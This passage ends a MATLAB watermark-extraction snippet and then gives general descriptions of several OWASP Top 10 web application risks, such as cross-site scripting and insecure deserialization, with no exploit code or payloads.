        GG(imsize(1)+1-i, imsize(2)+1-j, :) = GG(i, j, :);
    end
end
figure, imshow(GG); title('extracted watermark');
%imwrite(uint8(GG),'extracted watermark.jpg');
```
Cross-Site Scripting (XSS). XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user-supplied data using a browser API that can create HTML or JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
Insecure Deserialization. Insecure deserialization often leads to remote code execution. Even if deserialization flaws do not result in remote code execution, they can be used to perform attacks, including replay attacks, injection attacks, and privilege escalation attacks.
Using Components with Known Vulnerabilities. Components, such as libraries, frameworks, and other software modules, run with the same privileges as the application. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications and APIs using components with known vulnerabilities may undermine application defenses and enable various attacks and impacts.
Insufficient Logging & Monitoring. Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems, and tamper, extract, or destroy data. Most breach studies show time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring.